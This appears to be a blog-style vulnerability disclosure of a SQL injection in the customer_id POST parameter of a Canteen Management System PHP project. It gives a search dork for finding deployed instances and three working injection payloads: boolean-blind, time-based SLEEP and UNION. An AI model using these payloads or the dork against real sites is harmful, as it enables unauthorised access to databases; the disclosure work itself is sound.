Canteen Management System ajax_represent.php sql injection

Canteen Management System ajax_represent.php sql injection

inurl: youthappam/php_action/ajax_represent.php

Abstract:

Line 27 of ajax_represent.php invokes a SQL query built with input that comes from an untrusted source. This call could allow an attacker to modify the statement’s meaning or to execute arbitrary SQL commands.

Explanation:

SQL injection errors occur when:

  1. Data enters a program from an untrusted source.
  2. The data is used to dynamically construct a SQL query.

In this case, the data is passed to query() in ajax_represent.php at line 27.

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

current-db

在这里插入图片描述
payload:

Parameter: customer_id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: customer_id=1' AND 4961=4961 AND 'mqPP'='mqPP

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: customer_id=1' AND (SELECT 6401 FROM (SELECT(SLEEP(5)))eypH) AND 'vuyE'='vuyE

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: customer_id=-9319' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a6b7671,0x6c415159714766417374776d5443614642596d75705455494944776c49436974744d56574146766d,0x7171717871),NULL,NULL,NULL,NULL-- -

Download Code:
https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值